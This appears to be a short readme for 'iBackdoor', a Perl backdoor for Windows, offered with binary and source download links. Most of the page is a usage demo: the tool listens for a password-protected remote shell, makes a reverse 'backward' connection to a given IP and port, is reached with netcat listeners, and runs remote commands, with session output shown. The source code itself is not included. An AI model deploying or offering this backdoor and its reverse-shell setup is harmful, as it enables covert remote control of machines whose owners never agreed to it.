iBackdoor

Env: Windows XP SP2, ActiveState Perl 5.8.6, modules Cwd/IO::Pipe/IO::Socket/IO::Select.

Download: Binary iBackdoor.rar | Source iBackdoor.pl

NC(netcat): http://www.vulnwatch.org/netcat/nc111nt.zip

Example:

1.cmd1

                                                  backward_ip  backward_port
                                                       |         |
D:\Perl\scripts\Security\iBackdoor>iBackdoor.pl -b 127.0.0.1 -p 5555

2006/09/28 15:46:23, enable backward-mode to '127.0.0.1:5555'
2006/09/28 15:46:23, listening on local port '9803'.

2006/09/28 15:46:37, connected from '127.0.0.1:3443'.
2006/09/28 15:47:06, closed to '127.0.0.1:3443'.
2006/09/28 15:47:56, backward connect to '127.0.0.1:5555'
2006/09/28 15:48:09, closed to '127.0.0.1:5555'.
... ...

2.cmd2

C:\>nc localhost 9803

        Welcome to the machine ......

Password: 123456

[i@D:/Perl/scripts/Security/iBackdoor]% pwd
D:/Perl/scripts/Security/iBackdoor
[i@D:/Perl/scripts/Security/iBackdoor]% ls
 驱动器 D 中的卷没有标签。
 卷的序列号是 7818-950A

 D:\Perl\scripts\Security\iBackdoor 的目录

2006-09-28  15:46    <DIR>          .
2006-09-28  15:46    <DIR>          ..
2006-09-27  01:20               570 b.pl
2006-09-28  15:46             6,898 iBackdoor.pl
2006-09-23  09:46             1,695 readme.txt
2006-09-27  00:44             7,183 复件 iBackdoor.pl
               4 个文件         16,346 字节
               2 个目录  6,791,729,152 可用字节
[i@D:/Perl/scripts/Security/iBackdoor]% ping www.google.com

Pinging www-china.l.google.com [64.233.189.104] with 32 bytes of data:

Reply from 64.233.189.104: bytes=32 time=39ms TTL=247
Reply from 64.233.189.104: bytes=32 time=40ms TTL=247
Reply from 64.233.189.104: bytes=32 time=39ms TTL=247
Reply from 64.233.189.104: bytes=32 time=39ms TTL=247

Ping statistics for 64.233.189.104:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 39ms, Maximum = 40ms, Average = 39ms
[i@D:/Perl/scripts/Security/iBackdoor]% quit

        Bye.

C:\>

3.cmd3

C:\>nc -l -p 5555 localhost #wait about 30s at most

        Welcome to the machine ......

Password: 123456

[i@D:/Perl/scripts/Security/iBackdoor]% quit

        Bye.